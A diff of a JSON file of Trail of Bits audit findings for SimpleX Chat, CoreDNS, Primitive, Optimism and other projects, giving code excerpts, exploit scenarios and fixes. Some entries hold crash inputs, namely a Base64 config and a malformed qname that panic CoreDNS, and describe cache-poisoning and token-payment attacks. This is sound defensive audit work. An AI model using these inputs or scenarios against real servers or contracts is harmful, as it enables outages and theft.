Long term, review the codebase for instances in which data is indexed without undergoing a length check; handling untrusted data in this way may lead to a more severe DoS.", "labels": [ "Trail of Bits", - "Severity: Undetermined", - "Difficulty: High" + "Severity: Informational", + "Difficulty: Undetermined" ] }, { - "title": "1. X3DH does not apply HKDF to generate secrets ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/SimpleXChat.pdf", - "body": "The extended triple Die-Hellman (X3DH) key agreement protocol works by computing three separate Die-Hellman computations between pairs of keys. In particular, each party has a longer term private and public key pair as well as a more short-term private and public key pair. The three separate Die-Hellman computations are performed between the various pairs of long term and short term keys. The key agreement is performed this way to simultaneously authenticate each party and provide forward secrecy, which limits the impact of compromised keys. When performing the X3DH key agreement, the nal shared secret is formed by applying HKDF to the concatenation of all three Die-Hellman outputs. The computation is performed this way so that the shared secret depends on the entropy of all three Die-Hellman computations. If the X3DH protocol is being used to generate multiple shared secrets (which is the case for SimpleX), then these secrets should be formed by computing the HKDF over all three Die-Hellman outputs and then splitting the output of HKDF into separate shared secrets. However, as shown in Figure 1.1, the SimpleX implementation of X3DH uses each of the three Die-Hellman outputs as separate secrets for the Double Ratchet protocol, rather than inputting them into HKDF and splitting the output. x3dhSnd :: DhAlgorithm a => PrivateKey a -> PrivateKey a -> E2ERatchetParams a -> RatchetInitParams x3dhSnd spk1 spk2 ( E2ERatchetParams _ rk1 rk2) = x3dh (publicKey spk1, rk1) (dh' rk1 spk2) (dh' rk2 spk1) (dh' rk2 spk2) x3dhRcv :: DhAlgorithm a => PrivateKey a -> PrivateKey a -> E2ERatchetParams a -> RatchetInitParams x3dhRcv rpk1 rpk2 ( E2ERatchetParams _ sk1 sk2) = x3dh (sk1, publicKey rpk1) (dh' sk2 rpk1) (dh' sk1 rpk2) (dh' sk2 rpk2) x3dh :: DhAlgorithm a => ( PublicKey a, PublicKey a) -> DhSecret a -> DhSecret a -> DhSecret a -> RatchetInitParams x3dh (sk1, rk1) dh1 dh2 dh3 = RatchetInitParams {assocData, ratchetKey = RatchetKey sk, sndHK = Key hk, rcvNextHK = Key nhk} where assocData = Str $ pubKeyBytes sk1 <> pubKeyBytes rk1 (hk, rest) = B .splitAt 32 $ dhBytes' dh1 <> dhBytes' dh2 <> dhBytes' dh3 (nhk, sk) = B .splitAt 32 rest Figure 1.1: simplexmq/src/Simplex/Messaging/Crypto/Ratchet.hs#L98-L112 Performing the X3DH protocol this way will increase the impact of compromised keys and have implications for the theoretical forward secrecy of the protocol. To see why this is the case, consider what happens if a single key pair, (sk2 , spk2) , is compromised. In the current implementation, if an attacker compromises this key pair, then they can immediately recover the header key, hk , and the ratchet key, sk . However, if this were implemented by rst computing the HKDF over all three Die-Hellman outputs, then the attacker would not be able to recover these keys without also compromising another key pair. Note that SimpleX does not perform X3DH with long-term identity keys, as the SimpleX protocol does not rely on long-term keys to identify client devices. Therefore, the impact of compromising a key will be less severe, as it will aect only the secrets of the current session. Exploit Scenario An attacker is able to compromise a single X3DH key pair of a client using SimpleX chat. Because of how the X3DH is performed, they are able to then compromise the clients header key and ratchet key and can decrypt some of their messages. Recommendations Short term, adjust the X3DH implementation so that HKDF is computed over the concatenation of dh1 , dh2 , and dh3 before obtaining the ratchet key and header keys.", + "title": "5. Use of deprecated PreferServerCipherSuites eld ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/CoreDNS.pdf", + "body": "In the setTLSDefaults function of the tls plugin, the TLS conguration object includes a PreferServerCipherSuites eld, which is set to true . func setTLSDefaults(tls *ctls.Config) { tls.MinVersion = ctls.VersionTLS12 tls.MaxVersion = ctls.VersionTLS13 tls.CipherSuites = [] uint16 { ctls.TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384, ctls.TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384, ctls.TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305, ctls.TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305, ctls.TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256, ctls.TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256, ctls.TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384, ctls.TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384, ctls.TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256, } tls.PreferServerCipherSuites = true } Figure 5.1: plugin/tls/tls.go#L22-L37 In the past, this property controlled whether a TLS connection would use the cipher suites preferred by the server or by the client. However, as of Go 1.17, this eld is ignored. According to the Go documentation for crypto/tls , Servers now select the best mutually supported cipher suite based on logic that takes into account inferred client hardware, server hardware, and security. When CoreDNS is built using a recent Go version, the use of this property is redundant and may lead to false assumptions about how cipher suites are negotiated in a connection to a CoreDNS server. Recommendations Short term, add this issue to the internal issue tracker. Additionally, when support for Go versions older than 1.17 is entirely phased out of CoreDNS, remove the assignment to the deprecated PreferServerCipherSuites eld.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Undetermined" + ] + }, + { + "title": "6. Use of the MD5 hash function to detect Corele changes ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/CoreDNS.pdf", + "body": "The reload plugin is designed to automatically detect changes to a Corele and to reload it if necessary. To determine whether a le has changed, the plugin periodically compares the current MD5 hash of the le to the last hash calculated for it ( plugin/reload/reload.go#L81-L107 ). If the values are dierent, it reloads the Corele. However, the MD5 hash functions vulnerability to collisions decreases the reliability of this process; if two dierent les produce the same hash value, the plugin will not detect the dierence between them. Exploit Scenario An operator of a CoreDNS server modies a Corele, but the MD5 hash of the modied le collides with that of the old le. As a result, the reload plugin does not detect the change. Instead, it continues to use the outdated server conguration without alerting the operator to its use. Recommendations Short term, improve the robustness of the reload plugin by using the SHA-512 hash function instead of MD5.", "labels": [ "Trail of Bits", "Severity: Low", @@ -1810,59 +4500,79 @@ ] }, { - "title": "2. The pad function is incorrect for long messages ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/SimpleXChat.pdf", - "body": "The pad function from the Simplex.Messaging.Crypto module uses the fromIntegral function, resulting in an integer overow bug that leads to incorrect length encoding for messages longer than 65535 bytes (Figure 2.1). At the moment, the function appears to be called only with messages that are less than that; however, due to the general nature of the module, there is a risk of using a pad with longer messages as the message length assumption is not documented. pad :: ByteString -> Int -> Either CryptoError ByteString pad msg paddedLen | padLen >= 0 = Right $ encodeWord16 (fromIntegral len) <> msg <> B .replicate padLen '#' | otherwise = Left CryptoLargeMsgError where len = B .length msg padLen = paddedLen - len - 2 Figure 2.1: simplexmq/src/Simplex/Messaging/Crypto.hs#L805-L811 Exploit Scenario The pad function is used on messages longer than 65535 bytes, introducing a security vulnerability. Recommendations Short term, change the pad function to check the message length if it ts into 16 bits and return CryptoLargeMsgError if it does not. Long term, write unit tests for the pad function. Avoid using fromIntegral to cast to smaller integer types; instead, create a new function that will safely cast to smaller types that returns Maybe .", + "title": "7. Use of default math/rand seed in grpc and forward plugins random server-selection policy ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/CoreDNS.pdf", + "body": "The grpc and forward plugins use the random policy for selecting upstream servers. The implementation of this policy in the two plugins is identical and uses the math/rand package from the Go standard library. func (r *random) List(p []*Proxy) []*Proxy { switch len (p) { case 1 : return p case 2 : if rand.Int()% 2 == 0 { return []*Proxy{p[ 1 ], p[ 0 ]} // swap } return p } perms := rand.Perm( len (p)) rnd := make ([]*Proxy, len (p)) for i, p1 := range perms { rnd[i] = p[p1] } return rnd } Figure 7.1: plugin/grpc/policy.go#L19-L37 As highlighted in gure 7.1, the random policy uses either rand.Int or rand.Perm to choose the order of the upstream servers, depending on the number of servers that have been congured. Unless a program using the random policy explicitly calls rand.Seed , the top-level functions rand.Int and rand.Perm behave as if they were seeded with the value 1 , which is the default seed for math/rand . CoreDNS does not call rand.Seed to seed the global state of math/rand . Without this call, the grpc and forward plugins random selection of upstream servers is likely to be trivially predictable and the same every time CoreDNS is restarted. Exploit Scenario An attacker targets a CoreDNS instance in which the grpc or forward plugin is enabled. The attacker exploits the deterministic selection of upstream servers to overwhelm a specic server, with the goal of causing a DoS condition or performing an attack such as a timing attack. Recommendations Short term, instantiate a rand.Rand type with a unique seed, rather than drawing random numbers from the global math/rand state. CoreDNS takes this approach in several other areas, such as the loop plugin .", "labels": [ "Trail of Bits", "Severity: Low", - "Difficulty: High" + "Difficulty: Low" ] }, { - "title": "3. The unPad function throws exception for short messages ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/SimpleXChat.pdf", - "body": "The unPad function throws an undocumented exception when the input is empty or a single byte. This is due to the decodeWord16 function, which throws an IOException if the input is not exactly two bytes. The unPad function does not appear to be used on such short inputs in the current code. unPad :: ByteString -> Either CryptoError ByteString unPad padded | B .length rest >= len = Right $ B .take len rest | otherwise = Left CryptoLargeMsgError where ( lenWrd , rest) = B .splitAt 2 padded len = fromIntegral $ decodeWord16 lenWrd Figure 3.1: simplexmq/src/Simplex/Messaging/Crypto.hs#L813-L819 Exploit Scenario The unPad function takes a user-controlled input and throws an exception that is not handled in a thread that is critical to the functioning of the protocol, resulting in a denial of service. Recommendations Short term, validate the length of the input passed to the unPad function and return an error if the input is too short. Long term, write unit tests for the unPad function to ensure the validation works as intended.", + "title": "8. Cache plugin does not account for hash table collisions ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/CoreDNS.pdf", + "body": "To cache a DNS reply, CoreDNS maps the FNV-1 hash of the query name and type to the content of the reply in a hash table entry. func key(qname string , m *dns.Msg, t response.Type) ( bool , uint64 ) { // We don't store truncated responses. if m.Truncated { return false , 0 } // Nor errors or Meta or Update. if t == response.OtherError || t == response.Meta || t == response.Update { return false , 0 } return true , hash(qname, m.Question[ 0 ].Qtype) } func hash(qname string , qtype uint16 ) uint64 { h := fnv.New64() h.Write([] byte { byte (qtype >> 8 )}) h.Write([] byte { byte (qtype)}) h.Write([] byte (qname)) return h.Sum64() } Figure 8.1: plugin/cache/cache.go#L68-L87 To check whether there is a cached reply for an incoming query, CoreDNS performs a hash table lookup for the query name and type. If it identies a reply with a valid time to live (TTL), it returns the reply. CoreDNS assumes the stored DNS reply to be the correct one for the query, given the use of a hash table mapping. However, this assumption is faulty, as FNV-1 is a non-cryptographic hash function that does not oer collision resistance, and there exist utilities for generating colliding inputs to FNV-1 . As a result, it is likely possible to construct a valid (qname , qtype) pair that collides with another one, in which case CoreDNS could serve the incorrect cached reply to a client. Exploit Scenario An attacker aiming to poison the cache of a CoreDNS server generates a valid (qname* , qtype*) pair whose FNV-1 hash collides with a commonly queried (qname , qtype) pair. The attacker gains control of the authoritative name server for qname* and points its qtype* record to an address of his or her choosing. The attacker also congures the server to send a second record when (qname* , qtype*) is queried: a qtype record for qname that points to a malicious address. The attacker queries the CoreDNS server for (qname* , qtype*) , and the server caches the reply with the malicious address. Soon thereafter, when a legitimate user queries the server for (qname , qtype) , CoreDNS serves the user the cached reply for (qname* , qtype*) , since it has an identical FNV-1 hash. As a result, the legitimate users DNS client sees the malicious address as the record for qname . Recommendations Short term, store the original name and type of a query in the value of a hash table entry. After looking up the key for an incoming request in the hash table, verify that the query name and type recorded alongside the cached reply match those of the request. If they do not, disregard the cached reply. Short term, use the keyed hash function SipHash instead of FNV-1. SipHash was designed for speed and derives a 64-bit output value from an input value and a 128-bit secret key; this method adds pseudorandomness to a hash table key and makes it more dicult for an attacker to generate collisions oine. CoreDNS should use the crypto/rand package from Gos standard library to generate a cryptographically random secret key for SipHash on startup.", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: Undetermined" + ] + }, + { + "title": "9. Index-out-of-range reference in kubernetes plugin ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/CoreDNS.pdf", + "body": "The parseRequest function of the kubernetes plugin parses a DNS request before using it to query Kubernetes. By fuzzing the function, we discovered an out-of-range issue that can cause a panic. The issue occurs when the function calls stripUnderscore with an empty string, as it does when it receives a request with the qname .o.o.po.pod.8 and the zone interwebs. // stripUnderscore removes a prefixed underscore from s. func stripUnderscore(s string ) string { if s[ 0 ] != '_' { return s } return s[ 1 :] } Figure 9.1: plugin/kubernetes/parse.go#L97 Because of the time constraints of the audit, we could not nd a way to directly exploit this vulnerability. Although certain tools for sending DNS queries, like dig and host , verify the validity of a host before submitting a DNS query, it may be possible to exploit the vulnerability by using custom tooling or DNS over HTTPs (DoH). Exploit Scenario An attacker nds a way to submit a query with an invalid host (such as o.o.po.pod.8) to a CoreDNS server running as the DNS server for a Kubernetes endpoint. Because of the index-out-of-range bug, the kubernetes plugin causes CoreDNS to panic and crash, resulting in a DoS. Recommendations Short term, to prevent a panic, implement a check of the value of the string passed to the stripUnderscore function.", "labels": [ "Trail of Bits", "Severity: Undetermined", + "Difficulty: Undetermined" + ] + }, + { + "title": "10. Calls to time.After() in select statements can lead to memory leaks ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/CoreDNS.pdf", + "body": "Calls to the time.After function in select/case statements within for loops can lead to memory leaks. This is because the garbage collector does not clean up the underlying Timer object until the timer has red. A new timer is initialized at the start of each iteration of the for loop (and therefore with each select statement), which requires resources. As a result, if many routines originate from a time.After call, the system may experience memory overconsumption. for { select { case <-ctx.Done(): log.Debugf( \"Breaking out of CloudDNS update loop for %v: %v\" , h.zoneNames, ctx.Err()) return case <-time.After( 1 * time.Minute) : if err := h.updateZones(ctx); err != nil && ctx.Err() == nil /* Don't log error if ctx expired. */ { log.Errorf( \"Failed to update zones %v: %v\" , h.zoneNames, err) } Figure 10.1: A time.After() routine that causes a memory leak ( plugin/clouddns/clouddns.go#L85-L93 ) The following portions of the code contain similar patterns: plugin/clouddns/clouddns.go#L85-L93 plugin/azure/azure.go#L87-96 plugin/route53/route53.go#87-96 Exploit Scenario An attacker nds a way to overuse a function, which leads to overconsumption of a CoreDNS servers memory and a crash. Recommendations Short term, use a ticker instead of the time.After function in select/case statements included in for loops. This will prevent memory leaks and crashes caused by memory exhaustion. Long term, avoid using the time.After method in for-select routines and periodically use a Semgrep query to detect similar patterns in the code. References DevelopPaper post on the memory leak vulnerability in time.After Golang <-time.After() Is Not Garbage Collected before Expiry (Medium post)", + "labels": [ + "Trail of Bits", + "Severity: Low", "Difficulty: High" ] }, { - "title": "4. Key material resides in unpinned memory and is not cleared after its lifetime ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/SimpleXChat.pdf", - "body": "The key material generated and processed by the SimpleXMQ library resides in unpinned memory, and the data is not cleared out from the memory as soon as it is no longer used. The key material will stay on the Haskell heap until it is garbage collected and overwritten by other data. Combined with unpinned memory pages where the Haskells heap is allocated, this creates a risk of paging out unencrypted memory pages with the key material to disk. Because the memory management is abstracted away by the language, the manual memory management required to pin and zero-out the memory in garbage-collected language as Haskell is challenging. This issue does not concern the communication security; only device security is aected. Exploit Scenario The unencrypted key material is paged out to the hard drive, where it is exposed and can be stolen by an attacker. Recommendations Short term, investigate the use of mlock/mlockall on supported platforms to prevent memory pages that contain key material to be paged out. Explicitly zero out the key material as soon as it is no longer needed. Long term, document the key material memory management and the threat model around it.", + "title": "11. Incomplete list of debugging data exposed by the prometheus plugin ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/CoreDNS.pdf", + "body": "Enabling the prometheus (metrics) plugin exposes an HTTP endpoint that lists CoreDNS metrics. The documentation for the plugin indicates that it reports data such as the total number of queries and the size of responses. However, other data that is reported by the plugin (and also available through the pprof plugin) is not listed in the documentation. This includes Go runtime debugging information such as the number of running goroutines and the duration of Go garbage collection runs. Because this data is not listed in the prometheus plugin documentation, operators may initially be unaware of its exposure. Moreover, the data could be instrumental in formulating an attack. # TYPE go_gc_duration_seconds summary go_gc_duration_seconds{quantile=\"0\"} 4.4756e-05 go_gc_duration_seconds{quantile=\"0.25\"} 6.0522e-05 go_gc_duration_seconds{quantile=\"0.5\"} 7.1476e-05 go_gc_duration_seconds{quantile=\"0.75\"} 0.000105802 go_gc_duration_seconds{quantile=\"1\"} 0.000205775 go_gc_duration_seconds_sum 0.010425592 go_gc_duration_seconds_count 123 # HELP go_goroutines Number of goroutines that currently exist. # TYPE go_goroutines gauge go_goroutines 18 # HELP go_info Information about the Go environment. # TYPE go_info gauge go_info{version=\"go1.17.3\"} 1 # HELP go_memstats_alloc_bytes Number of bytes allocated and still in use. # TYPE go_memstats_alloc_bytes gauge Figure 11.1: Examples of the data exposed by prometheus and omitted from the documentation Exploit Scenario An attacker discovers the metrics exposed by CoreDNS over port 9253. The attacker then monitors the endpoint to determine the eectiveness of various attacks in crashing the server. Recommendations Short term, document all data exposed by the prometheus plugin. Additionally, consider changing the data exposed by the prometheus plugin to exclude Go runtime data available through the pprof plugin.", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: Low", "Difficulty: High" ] }, { - "title": "1. Risk of miscongured GasPriceOracle state variables that can lock L2 ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-11-optimism-securityreview.pdf", - "body": "When bootstrapping the L2 network operated by op-geth , the GasPriceOracle contract is pre-deployed to L2, and its contract state variables are used to specify the L1 costs to be charged on L2. Three state variables are used to compute the costs decimals , overhead , and scalar which can be updated through transactions sent to the node. However, these state variables could be miscongured in a way that sets gas prices high enough to prevent transactions from being processed. For example, if overhead were set to the maximum value, a 256-bit unsigned integer, the subsequent transactions would not be accepted. In an end-to-end test of the above example, contract bindings used in op-e2e tests (such as the GasPriceOracle bindings used to update the state variables) were no longer able to make subsequent transactions/updates, as calls to SetOverhead or SetDecimals resulted in a deadlock. Sending a transaction directly through the RPC client did not produce a transaction receipt that could be fetched. Recommendations Short term, implement checks to ensure that GasPriceOracle parameters can be updated if fee parameters were previously miscongured. This could be achieved by adding an exception to GasPriceOracle fees when the contract owner calls methods within the contract or by setting a maximum fee cap. Long term, develop operational procedures to ensure the system is not deployed in or otherwise entered into an unexpected state as a result of operator actions. A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and diculty levels used in this document. Vulnerability Categories Category", + "title": "12. Cloud integrations require cleartext storage of keys in the Corele ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/CoreDNS.pdf", + "body": "The route53 , azure , and clouddns plugins enable CoreDNS to interact with cloud providers (AWS, Azure, and the Google Cloud Platform (GCP), respectively). To access clouddns , a user enters the path to the le containing his or her GCP credentials. When using route53 , CoreDNS pulls the AWS credentials that the user has entered in the Corele. If the AWS credentials are not included in the Corele, CoreDNS will pull them in the same way that the AWS command-line interface (CLI) would. While operators have options for the way that they provide AWS and GCP credentials, Azure credentials must be pulled directly from the Corele. Furthermore, the CoreDNS documentation lacks guidance on the risks of storing AWS, Azure, or GCP credentials in local conguration les . Exploit Scenario An attacker or malicious internal user gains access to a server running CoreDNS. The malicious actor then locates the Corele and obtains credentials for a cloud provider, thereby gaining access to a cloud infrastructure. Recommendations Short term, remove support for entering cloud provider credentials in the Corele in cleartext. Instead, load credentials for each provider in the manner recommended in that providers documentation and implemented by its CLI utility. CoreDNS should also refuse to load credential les with overly broad permissions and warn users about the risks of such les.", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: Medium", "Difficulty: High" ] }, { - "title": "1. Transfer operations may silently fail due to the lack of contract existence checks ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Primitive.pdf", - "body": "The pool fails to check that a contract exists before performing transfers. As a result, the pool may assume that failed transactions involving destroyed tokens or tokens that have not yet been deployed were successful. Transfers.safeTransfer , TransferHelper.safeTransfer , and TransferHelper.safeTransferFrom use low-level calls to perform transfers without conrming the contracts existence: ) internal { ( bool success , bytes memory returnData) = address (token).call( abi.encodeWithSelector(token.transfer.selector, to, value) ); require (success && (returnData.length == 0 || abi.decode(returnData, ( bool ))), \"Transfer fail\" ); } Figure 1.1: rmm-core/contracts/libraries/Transfers.sol#16-21 The Solidity documentation includes the following warning: The low-level functions call, delegatecall and staticcall return true as their rst return value if the account called is non-existent, as part of the design of the EVM. Account existence must be checked prior to calling if needed. Figure 1.2: The Solidity documentation details the necessity of executing existence checks before performing low-level calls. Therefore, if the tokens to be transferred have not yet been deployed or have been destroyed, safeTransfer and safeTransferFrom will return success even though the transfer was not executed. Exploit Scenario The pool contains two tokens: A and B. The A token has a bug, and the contract is destroyed. Bob is not aware of the issue and swaps 1,000 B tokens for A tokens. Bob successfully transfers 1,000 B tokens to the pool but does not receive any A tokens in return. As a result, Bob loses 1,000 B tokens. Recommendations Short term, implement a contract existence check before the low-level calls in Transfer.safeTransfer , TransferHelper.safeTransfer , and TransferHelper.safeTransferFrom . This will ensure that a swap will revert if the token to be bought no longer exists, preventing the pool from accepting the token to be sold without returning any tokens in exchange. Long term, avoid implementing low-level calls. If such calls are unavoidable, carefully review the Solidity documentation , particularly the Warnings section, before implementing them to ensure that they are implemented correctly.", + "title": "13. Lack of rate-limiting controls ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/CoreDNS.pdf", + "body": "CoreDNS does not enforce rate limiting of DNS queries, including those sent via DoH. As a result, we were able to issue the same request thousands of times in less than one minute over the HTTP endpoint /dns-query . Figure 13.1: We sent 3,424 requests to CoreDNS without being rate limited. During our tests, the lack of rate limiting did not appear to aect the application. However, processing requests sent at such a high rate can consume an inordinate amount of host resources, and a lack of rate limiting can facilitate DoS and DNS amplication attacks. Exploit Scenario An attacker oods a CoreDNS server with HTTP requests, leading to a DoS condition. Recommendations Short term, consider incorporating the rrl plugin, used for the rate limiting of DNS queries, into the CoreDNS codebase. Additionally, implement rate limiting on all API endpoints. An upper bound can be applied at a high level to all endpoints exposed by CoreDNS. Long term, run stress tests to ensure that the rate limiting enforced by CoreDNS is robust.", "labels": [ "Trail of Bits", "Severity: Low", - "Difficulty: Low" + "Difficulty: Medium" ] }, { - "title": "11. Code duplication in crowdloans pallet ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/ParallelFinance.pdf", - "body": "A number of extrinsics in the crowdloans pallet have duplicate code. The close , reopen , and auction_succeeded extrinsics have virtually identical logic. The migrate_pending and refund extrinsics are also fairly similar. Exploit Scenario A vulnerability is found in the duplicate code, but it is patched in only one place. Recommendations Short term, refactor the close , reopen , and auction_succeeded extrinsics into one function, to be called with values specic to the extrinsics. Refactor common pieces of logic in the migrate_pending and refund extrinsics. Long term, avoid code duplication, as it makes the system harder to review and update. Perform regular code reviews and track any logic that is duplicated.", + "title": "14. Lack of a limit on the size of response bodies ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/CoreDNS.pdf", + "body": "The ioutil.ReadAll function reads from a source input until encountering an error or the end of the le, at which point it returns the data that it read. The toMsg function, which processes requests for the HTTP server, uses ioutil.ReadAll to parse requests and to read POST bodies. However, there is no limit on the size of request bodies. Using ioutil.ReadAll to parse a large request that is loaded multiple times may exhaust the systems memory, causing a DoS. func toMsg(r io.ReadCloser) (*dns.Msg, error ) { buf, err := io.ReadAll(r) if err != nil { return nil , err } m := new (dns.Msg) err = m.Unpack(buf) return m, err } Figure 14.1: plugin/pkg/doh/doh.go#L94-L102 Exploit Scenario An attacker generates multiple POST requests with long request bodies to /dns-query , leading to the exhaustion of its resources. Recommendations Short term, use the io.LimitReader function or another mechanism to limit the size of request bodies. Long term, consider implementing application-wide limits on the size of request bodies to prevent DoS attacks.", "labels": [ "Trail of Bits", "Severity: Informational", @@ -1870,159 +4580,219 @@ ] }, { - "title": "2. Project dependencies contain vulnerabilities ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Primitive.pdf", - "body": "Although dependency scans did not indicate a direct threat to the project under review, yarn audit identied dependencies with known vulnerabilities. Due to the sensitivity of the deployment code and its environment, it is important to ensure dependencies are not malicious. Problems with dependencies in the JavaScript community could have a signicant eect on the repositories under review. The output below details these issues. CVE ID", + "title": "15. Index-out-of-range panic in grpc plugin initialization ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/CoreDNS.pdf", + "body": "Initializing the grpc plugin involves parsing the relevant conguration section. func parseStanza(c *caddy.Controller) (*GRPC, error ) { g := newGRPC() if !c.Args(&g.from) { return g, c.ArgErr() } g.from = plugin.Host(g.from).NormalizeExact()[ 0 ] // only the first is used. Figure 15.1: plugin/grpc/setup.go#L53-L59 An invalid conguration le for the grpc plugin could cause the call to NormalizeExtract (highlighted in gure 15.1) to return a value with zero elements. A Base64-encoded example of such a conguration le is shown below. MApncnBjIDAwMDAwMDAwMDAwhK2FhYKtMIStMITY2NnY2dnY7w== Figure 15.2: The Base64-encoded grpc conguration le Specifying a conguration le like that in gure 15.2 would cause CoreDNS to panic when attempting to access the rst element of the return value. panic: runtime error: index out of range [0] with length 0 goroutine 1 [running]: github.com/coredns/coredns/plugin/grpc.parseStanza(0xc0002f0900) /home/ubuntu/audit-coredns/client-code/coredns/plugin/grpc/setup.go:59 +0x31b github.com/coredns/coredns/plugin/grpc.parseGRPC(0xc0002f0900) /home/ubuntu/audit-coredns/client-code/coredns/plugin/grpc/setup.go:45 +0x5e github.com/coredns/coredns/plugin/grpc.setup(0x1e4dcc0) /home/ubuntu/audit-coredns/client-code/coredns/plugin/grpc/setup.go:17 +0x30 github.com/coredns/caddy.executeDirectives(0xc0000e2900, {0x7ffc15b696e0, 0x31}, {0x324cfa0, 0x31, 0x1000000004b7e06}, {0xc000269300, 0x1, 0x8}, 0x0) /home/ubuntu/go/pkg/mod/github.com/coredns/caddy@v1.1.1/caddy.go:661 +0x5f6 github.com/coredns/caddy.ValidateAndExecuteDirectives({0x2239518, 0xc0002b2980}, 0xc0002b2980, 0x0) /home/ubuntu/go/pkg/mod/github.com/coredns/caddy@v1.1.1/caddy.go:612 +0x3e5 github.com/coredns/caddy.startWithListenerFds({0x2239518, 0xc0002b2980}, 0xc0000e2900, 0x0) /home/ubuntu/go/pkg/mod/github.com/coredns/caddy@v1.1.1/caddy.go:515 +0x274 github.com/coredns/caddy.Start({0x2239518, 0xc0002b2980}) /home/ubuntu/go/pkg/mod/github.com/coredns/caddy@v1.1.1/caddy.go:472 +0xe5 github.com/coredns/coredns/coremain.Run() /home/ubuntu/audit-coredns/client-code/coredns/coremain/run.go:62 +0x1cd main.main() /home/ubuntu/audit-coredns/client-code/coredns/coredns.go:12 +0x17 Figure 15.3: CoreDNS panics when loading the grpc conguration. Exploit Scenario An operator of a CoreDNS server miscongures the grpc plugin, causing a panic. Because CoreDNS does not provide a clear explanation of what went wrong, it is dicult for the operator to troubleshoot and x the issue. Recommendations Short term, verify that the variable returned by NormalizeExtract has at least one element before indexing it. Long term, review the codebase for instances in which data is indexed without undergoing a length check; handling untrusted data in this way may lead to a more severe DoS. A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and diculty levels used in this document. Vulnerability Categories Category", "labels": [ "Trail of Bits", - "Severity: Medium", + "Severity: Informational", "Difficulty: Undetermined" ] }, { - "title": "3. Anyone could steal pool tokens earned interest ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Primitive.pdf", - "body": "If a PrimitiveEngine contract is deployed with certain ERC20 tokens, unexpected token interest behavior could allow token interest to count toward the number of tokens required for the deposit , allocate , create , and swap functions, allowing the user to avoid paying in full. Liquidity providers use the deposit function to increase the liquidity in a position. The following code within the function veries that the pool has received at least the minimum number of tokens required by the protocol: if (delRisky != 0 ) balRisky = balanceRisky(); if (delStable != 0 ) balStable = balanceStable(); IPrimitiveDepositCallback( msg.sender ).depositCallback(delRisky, delStable, data); // agnostic payment if (delRisky != 0 ) checkRiskyBalance(balRisky + delRisky); if (delStable != 0 ) checkStableBalance(balStable + delStable); emit Deposit( msg.sender , recipient, delRisky, delStable); Figure 3.1: rmm-core/contracts/PrimitiveEngine.sol#213-217 Assume that both delRisky and delStable are positive. First, the code fetches the current balances of the tokens. Next, the depositCallback function is called to transfer the required number of each token to the pool contract. Finally, the code veries that each tokens balance has increased by at least the required amount. There could be a token that allows token holders to earn interest simply because they are token holders. To retrieve this interest, token holders could call a certain function to calculate the interest earned and increase their balances. An attacker could call this function from within the depositCallback function to pay out interest to the pool contract. This would increase the pools token balance, decreasing the number of tokens that the user needs to transfer to the pool contract to pass the balance check (i.e., the check conrming that the balance has suciently increased). In eect, the users token payment obligation is reduced because the interest accounts for part of the required balance increase. To date, we have not identied a token contract that contains such a functionality; however, it is possible that one exists or could be created. Exploit Scenario Bob deploys a PrimitiveEngine contract with token1 and token2. Token1 allows its holders to earn passive interest. Anyone can call get_interest(address) to make a certain token holders interest be claimed and added to the token holders balance. Over time, the pool can claim 1,000 tokens. Eve calls deposit , and the pool requires Eve to send 1,000 tokens. Eve calls get_interest(address) in the depositCallback function instead of sending the tokens, depositing to the pool without paying the minimum required tokens. Recommendations Short term, add documentation explaining to users that the use of interest-earning tokens can reduce the standard payments for deposit , allocate , create , and swap . Long term, using the Token Integration Checklist (appendix C), generate a document detailing the shortcomings of tokens with certain features and the impacts of their use in the Primitive protocol. That way, users will not be alarmed if the use of a token with nonstandard features leads to unexpected results.", + "title": "1. Initialization functions can be front-run ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", + "body": "The CrosslayerPortal contracts have initializer functions that can be front-run, allowing an attacker to incorrectly initialize the contracts. Due to the use of the delegatecall proxy pattern, these contracts cannot be initialized with their own constructors, and they have initializer functions: function initialize() public initializer { __Ownable_init(); __Pausable_init(); __ReentrancyGuard_init(); } Figure 1.1: The initialize function in MsgSender:126-130 An attacker could front-run these functions and initialize the contracts with malicious values. This issue aects the following system contracts: contracts/core/BridgeAggregator contracts/core/InvestmentStrategyBase contracts/core/MosaicHolding contracts/core/MosaicVault contracts/core/MosaicVaultConfig contracts/core/functionCalls/MsgReceiverFactory contracts/core/functionCalls/MsgSender contracts/nfts/Summoner contracts/protocols/aave/AaveInvestmentStrategy contracts/protocols/balancer/BalancerV1Wrapper 